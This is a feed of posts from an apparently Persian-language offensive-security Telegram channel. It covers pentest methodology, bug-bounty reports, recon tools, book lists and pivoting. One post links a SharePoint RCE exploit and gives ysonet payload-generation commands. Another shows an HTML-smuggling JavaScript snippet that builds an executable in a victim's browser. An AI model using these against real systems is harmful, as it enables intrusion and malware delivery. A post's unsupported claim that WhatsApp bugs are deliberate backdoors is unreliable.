RadvanSec – Telegram
RadvanSec
990 subscribers
180 photos
27 videos
142 files
593 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
📏 استاندارد اجرای تست نفوذ (PTES)

این استاندارد، یکی از کامل‌ترین و شناخته‌شده‌ترین مدل‌ها برای انجام تست نفوذ حرفه‌ایه. اکثر تیم‌های امنیتی به این مدل استناد می‌کنن چون ساختاری منطقی و مرحله ‌به‌ مرحله ارائه می‌ده.

Pre-engagement Interactions
تعاملات و توافق‌های اولیه با مشتری قبل از شروع تست

Intelligence Gathering
جمع‌آوری اطلاعات اولیه (شناسایی - Recon)

Threat Modeling
مدل‌سازی تهدیدات (تحلیل اینکه چه تهدیدهایی برای سیستم وجود داره)

Vulnerability Analysis
تحلیل آسیب‌پذیری‌ها

Exploitation
بهره‌برداری (استفاده از آسیب‌پذیری‌ها)

Post-Exploitation
کارهایی که بعد از Exploit انجام می‌دیم (مثل حفظ دسترسی، حرکت افقی، رمزها و...)

Reporting
تهیه گزارش نهایی تست نفوذ

لینک: Pre-engagement Interactions
تعاملات و توافق‌های اولیه با مشتری قبل از شروع تست

Intelligence Gathering
جمع‌آوری اطلاعات اولیه (شناسایی - Recon)

Threat Modeling
مدل‌سازی تهدیدات (تحلیل اینکه چه تهدیدهایی برای سیستم وجود داره)

Vulnerability Analysis
تحلیل آسیب‌پذیری‌ها

Exploitation
بهره‌برداری (استفاده از آسیب‌پذیری‌ها)

Post-Exploitation
کارهایی که بعد از Exploit انجام می‌دیم (مثل حفظ دسترسی، حرکت افقی، رمزها و...)

Reporting
تهیه گزارش نهایی تست نفوذ

پیشنهاد میکنم کامل بخونید نکات خوبی داره :
http://www.pentest-standard.org/

⭐️ @ZeroSec_team
3👍1👌1
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 22 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 13 new items
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow :
👉 @zerosec_team
2🤩1
#AppSec
#Whitepaper
#Threat_Research
"Application Programming Interface (API):
Vulnerabilities and Risks
", Special Report, 2024.

// This report describes 11 common vulnerabilities and 3 risks related to APIs, providing suggestions about how to fix or reduce their impact. Recommendations include using a standard API documentation process, using automated testing, and ensuring the security of the identity and access management system

See also:
]-> API Specification Parser
]-> Tool to detect API auth weaknesses
]-> API Security Vulnerability Scanner

──────────────
📡 Follow :
👉 @zerosec_team
2👏1
Advance Search Engine For Hackers

http://shodan.io —> (🌐 Server, 🛠 Vulnerabilities)
http://google.com —> (💁‍♀️ Dorks)
http://wigle.net —> (☁️ Wifi Networks)
http://grep.app —> (😀 Code Search)
http://app.binaryedge.io —> (💗 Threat Intelligence)
http://onyphe.io —> (🌐 Server)
http://viz.greynoise.io —> (⚡️ Threat Intelligence)
http://censys.io —> ( Server)
http://hunter.io —> ( Email Addresses)
http://fofa.info —> ( Threat Intelligence)
http://zoomeye.org —> ( Threat Intelligence)
http://leakix.net —> ( Threat Intelligence)
http://intelx.io —> ( OSINT)
http://app.netlas.io —> ( Attack Surface)
http://searchcode.com —> (💻 Code Search)
http://urlscan.io —> (🤔 Threat Intelligence)
http://publicwww.com —> (🖥 Code Search)
http://fullhunt.io —> (🔒 Attack Surface)
http://socradar.io —> ( Threat Intelligence)
http://binaryedge.io —> (🎀 Attack Surface)
http://ivre.rocks —> (🦋 Server)
http://crt.sh —> (💓 Certificate Search)
http://vulners.com —> (👑Vulnerabilities)
http://pulsedive.com —> (🥘 Threat Intelligence)
http://hybrid-analysis.com —> (⭐️ Malware Analysis)
http://threatcrowd.org —> (🕺Threat Intelligence)
http://cve.mitre.org —> (⭐️ Vulnerability Database)
http://haveibeenpwned.com —> (💗 Data Breaches)
http://spyonweb.com —> (❤️ Website Ownership)
http://dnsdumpster.com —> (🌐 DNS Reconnaissance)
http://archive.org —> (🤗 Historical Website Data)
http://certstream.calidog.io —> (🐳 Real-time Certificates)
http://passivetotal.org —> (🪽 Passive DNS Data)
http://wigle.net —> (🌸 Wi-Fi Network Mapping)
http://malshare.com —> ( Malware Repository)
http://threatminer.org —> (😍 Threat Intelligence)
http://binaryedge.io —> (🙂 Attack Surface)
http://vuldb.com —> (😳 Vulnerability Database)
http://bgpview.io —> ( BGP Information)
http://onionsearchengine.com —> (😳 Dark Web Search)

@ZeroSec_team
4
🕵️‍♂️ هک از دل تاریخ: Wayback Machine Bug Bounty

10K$ 💸 بانتی تو همین یه نکته ظاهر ساده خوابیده

تو باگ‌بانتی فقط ابزار جدید مهم نیست... گاهی یه سر به گذشته بزن، شاید یه کلید اونجا جا مونده! 🔑

📦 Wayback Machine رو حتماً توی فاز Recon استفاده کن:

پیدا کردن فایل‌هایی که حذف شدن ولی تو آرشیو هستن: .env, config.js, debug.log, upload.php
لو رفتن API Keyها یا Tokenهایی که dev فراموش کرده revoke کنه
بررسی تغییرات پروژه تو GitHub، کشف فانکشن‌ها یا endpointهایی که شاید هنوز زنده‌ن
استخراج endpointهای قدیمی از archive.org و تست دوباره‌شون
فیشینگ یا abuse با iframeهای oEmbed و iframe injection از نسخه‌های قبلی سایت

🛠 ابزار پیشنهادی:


echo "github.com/orgname" | waybackurls > urls.txt


#BugBounty #Recon #Wayback #GitHub #InfoLeak #HackSmartNotHard #ZeroSec

@ZeroSec_team
👍21🏆1
"اگر ده ساعت وقت داشته باشم برای قطع کردن یک درخت، نه ساعتش را صرف تیز کردن تبرم می‌کنم."
—آبراهام لینکلن

در دنیای هک و امنیت هم همینطوره:

قبل از حمله، باید وقتت رو بذاری برای شناخت دقیق هدف، جمع‌آوری اطلاعات (Recon)، تحلیل ساختار، آماده‌سازی ابزار و تست‌های محلی.
چون یه حملهٔ هوشمندانه و دقیق، از صد تا اسکن کور و اکسپلویت نصفه‌نیمه ارزشمندتره.

شب بخیر

#RedTeaming #BugBounty #HackerMindset #InfoSec #ZeroSec

@ZeroSec_team
7👏1
📊 Watcher Summary Report

🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 68 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

@ZeroSec_team
21👍1
📊 Watcher Summary Report

🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

@ZeroSec_team
1👍1
Red_Team_How_to_Succeed_by_Thinking_Like_the_Enemy_by_Micah_Zenko.pdf
4 MB
Red Team: How to Succeed By Thinking Like the Enemy — by Micah Zenko

بخونید تا رستگار شوید

#Book #RedTeam #ZeroSec

@ZeroSec_team
2👍1
این اولین بار نیست! آسیب‌پذیری‌های مشابه هر سال از 2017 تا الان گزارش شده:

RCE از طریق تماس تصویری (2019)
اجرای کد با فایل ویدیو (2020)
جاسوس‌افزار Pegasus روی واتساپ!

احتمال خیلی زیاد تمام این باگ ها تعمدی و backdoor هستند

#امنیت #Whatsapp #Backdoor #Hack

@ZeroSec_team
4😱1
📊 Watcher Summary Report

🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 11 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
BullShit Books :

1. Bug Bounty Bootcamp – Vickie Li

2. Web Hacking 101 – Peter Yaworski

3. Real-World Bug Hunting – Peter Yaworski

4. The Basics of Hacking and Penetration Testing – Patrick Engebretson

5. Penetration Testing: A Hands-On Introduction to Hacking – Georgia Weidman

6. Hacking Web Apps – Mike Shema

7. The Hacker Playbook 1 – Peter Kim

8. Gray Hat Hacking

#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #BullshitBooks #CTF #EthicalHacking #HackTip

⭐️ @ZeroSec_team
👏5👎1
Nice Books :

1. The Web Application Hacker's Handbook –Dafydd Stuttard & Marcus Pinto

2. The Hacker Playbook 2 & 3 – Peter Kim (not recommended)

3. Hacking: The Art of Exploitation – Jon Erickson

4. Advanced Web Attacks and Exploitation – Dafydd Stuttard

5. Web Security for Developers – Malcolm McDonald

6. Real-World Web Application Security – Andrew Hoffman

7. Bug Bounty Hunting Essentials – Carlos A. Lozano

8. Black Hat Python – Justin Seitz

#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #Pentesting #EthicalHacking #Exploitation #AdvancedHacking

⭐️ @ZeroSec_team
👍31
DE&TH_Guide_1_3.pdf
2 MB
#DFIR
#Whitepaper
#Blue_Team_Techniques
"Detection Engineering & Threat Hunting (DE&TH) Guide", ver.1.3, Aug. 2025.

⭐️ @ZeroSec_team
1🙏1
#rce #pentest #redteam #ad #sharepoint #cve
CVE-2025-53770: SharePoint RCE (ToolShell)

Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit

Upd: https://github.com/irsdl/ysonet


ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 1 -c "calc"



ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 2 -c "C:\\temp\\ExploitClass.cs;System.dll"


Patched: July 20, 2025

⭐️ @ZeroSec_team
4
HTML Smuggling چیه و چرا خطرناکه؟

یه تکنیک خفن تو حملات سایبریه که هکر باهاش می‌تونه بدافزار رو بدون دانلود از سرور خودش، داخل مرورگر قربانی تولید کنه!

یعنی چی؟ یعنی به‌جای اینکه فایل مخرب مثل malware.exe رو مستقیم به قربانی بده، یه فایل HTML می‌فرسته که توش یه کد جاوااسکریپت هست. این کد تو مرورگر اجرا می‌شه و فایل رو از صفر می‌سازه و به قربانی می‌ده!

مثال:

let file = atob("TVqQAAMAAAAEAAAA...");
let blob = new Blob([Uint8Array.from(file, c => c.charCodeAt(0))]);
let url = URL.createObjectURL(blob);
window.open(url); // یا auto download


یه فایل اجرایی که:

نه از نت دانلود شده
نه توی ترافیک دیده می‌شه
نه فایروال جلوش رو می‌گیره
و نه حتی آنتی‌ویروس متوجه می‌شه!

این یکی از روش‌های محبوب برای Initial Access هست.

#HTML_Smuggling #RedTeam #CyberSecurity #Phishing #InitialAccess

⭐️ @ZeroSec_team
5👍2
«سلام به دنیای جدید امنیت با ظهور هوش مصنوعی»

دنیای آینده‌ی امنیت، با ظهور هوش مصنوعی بر دو پایه استواره:

۱. استفاده از AI به‌عنوان ابزاری فوق‌پیشرفته
۲. بهره‌گیری از خطاهای انسانی به‌عنوان راه ورود

#XBOW #HackerOne #AI #CyberSecurity #RedTeam

⭐️ @ZeroSec_team
1🔥1😱1
📊 Watcher Summary Report

🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 51 new items
🔹 INTIGRITI: 3 new items
🔹 YESWEHACK: 8 new items
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
2
Pivoting: تسلط مرحله‌ به‌ مرحله بر شبکه‌های داخلی

Pivoting یک تکنیک حیاتی در مرحله‌ی Post-Exploitation و بخش مرکزی Lateral Movement محسوب می‌شود.

Pivoting یعنی استفاده از host تسخیر شده به‌ عنوان نقطه عبور (bridge node) برای رسیدن به subnetهایی که از شبکه‌ی مهاجم (attacker C2) به‌طور مستقیم قابل دسترسی نیستند (non-routable/internal segments)

سناریوی رایج:

Exploit → Initial Access به DMZ

Recon: شناسایی internal segments (مثلاً با ARP scan یا route enumeration)

Pivot Setup: ایجاد مسیر ارتباطی
حرکت به سمت اهداف high-value مثل Domain Controllers، فایل‌سرورها یا اپ‌های مدیریتی داخلی

قبل از هر pivot باید route ها، firewall rule ها و ACL ها بررسی شوند. بدون visibility دقیق، هر گونه ترافیک غیرعادی می‌تواند باعث شناسایی عملیات شود.

#RedTeamOps #Pivoting #NetworkSegmentationBypass #AdvancedPostExploitation

⭐️ @ZeroSec_team
1👍1👎1🔥1